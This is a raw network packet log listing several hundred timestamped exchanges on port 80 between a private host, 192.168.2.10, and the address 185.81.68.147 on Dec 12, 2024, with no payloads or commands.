Dec 12, 2024 16:48:47.950030088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.950905085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.950970888 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.951503992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.951977015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.952042103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.952060938 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.953057051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.953495979 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.953588963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.953991890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.953996897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.954622030 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.954905033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.955033064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.955394983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.955921888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.957007885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.957012892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.957019091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.957084894 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.957967997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.958350897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.958934069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.959019899 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.959986925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.960047007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.960052013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.960136890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.961114883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.961266041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.961349964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.962038994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.962585926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.962716103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.963002920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.963304043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.963422060 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.964047909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.964297056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.964401960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.965042114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.965774059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.965876102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.966105938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.966110945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.966217041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.967088938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.967690945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.967834949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.968151093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.968156099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.968229055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.969108105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.969537020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.970050097 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.970087051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.970139980 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.970715046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.971131086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.971560955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.971673012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.972094059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.973406076 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.111213923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.111383915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.111515999 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.111675024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.111823082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.111910105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.112699986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.112761974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.113156080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.113732100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.113806963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.113959074 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.114708900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.114877939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.114953995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.115777969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.115931988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.116043091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.116827011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.116833925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.116960049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.117789030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.118038893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.118148088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.118801117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.118963003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.119101048 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.119788885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.119972944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.120500088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.120829105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.120959997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.121112108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.121840954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.122215033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.122673988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.122857094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.122976065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.123054028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.123879910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.123975039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.124053001 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.124919891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.125564098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.125804901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.125936031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.125945091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.126015902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.126979113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.128047943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.128062010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.128177881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.128331900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.129056931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.129101992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.129163027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.129184008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.129957914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.131017923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.131023884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.131081104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.131196976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.131994009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.132083893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.132226944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.133019924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.133390903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.134006023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.134119034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.134180069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.135021925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.135047913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.135150909 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.136065006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.136157036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.136480093 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.137028933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.137178898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.137276888 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.138114929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.138340950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.138442039 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.139107943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.139231920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.139327049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.140146017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.140265942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.140718937 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.141133070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.141942978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.142050028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.142184019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.142190933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.142342091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.143147945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.143276930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.143397093 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.144167900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.144402027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.145209074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.145215034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.145298004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.146178961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.146581888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.146693945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.147197008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.147635937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.147725105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.148205042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.148332119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.149245977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.149354935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.149538040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.150298119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.150302887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.150394917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.151276112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.151362896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.151449919 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.152483940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.153027058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.153110027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.153368950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.154318094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.154323101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.154408932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.154484987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.155356884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.155458927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.155482054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.155719995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.156317949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.156564951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.157325983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.157387972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.157499075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.157589912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.158421993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.158493996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.158596992 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.159413099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.159420013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.159586906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.160548925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.160725117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.160928965 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.161429882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.161952972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.162051916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.162472010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.162477970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.162590981 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.163430929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.163729906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.164186954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.164452076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.303571939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.303580999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.303731918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.303787947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.303850889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.303885937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.304789066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.304902077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.305108070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.305839062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.305942059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.305947065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.306814909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.307697058 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.307835102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.307842016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.307940960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.307952881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.308917046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.309166908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.309263945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.309849977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.309921026 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.310556889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.310867071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.310904980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.310971022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.311898947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.312927961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.312963963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.312972069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.313031912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.313061953 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.313903093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.313971043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.314990044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.314996958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.315004110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.315076113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.316056013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.316137075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.316143990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.316991091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.316999912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.317097902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.318033934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.318252087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.318455935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.318969965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.319103956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.319360018 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.320008993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.320390940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.320487022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.321017027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.321300030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.321412086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.322036982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.322120905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.323107958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.323112965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.323118925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.323213100 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.324104071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.324146986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.324263096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.325052977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.325154066 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.325752974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.326113939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.326121092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.326214075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.327259064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.327265978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.327377081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.328092098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.328315020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.328933001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.329137087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.329142094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.329185963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.330199003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.330271006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.330364943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.331274986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.331368923 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.331412077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.332185984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.332262039 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.332278967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.333276033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.333375931 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.333406925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.334347010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.334431887 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.334780931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.335347891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.335405111 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.335839033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.336272001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.336328983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.337428093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.337435007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.337441921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.337529898 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.338296890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.338399887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.338457108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.339325905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.339385033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.339930058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.340320110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.340327024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.340432882 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.341320992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.341401100 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.342350960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.342358112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.342391968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.342433929 CET	49946	80	192.168.2.10	185.81.68.147
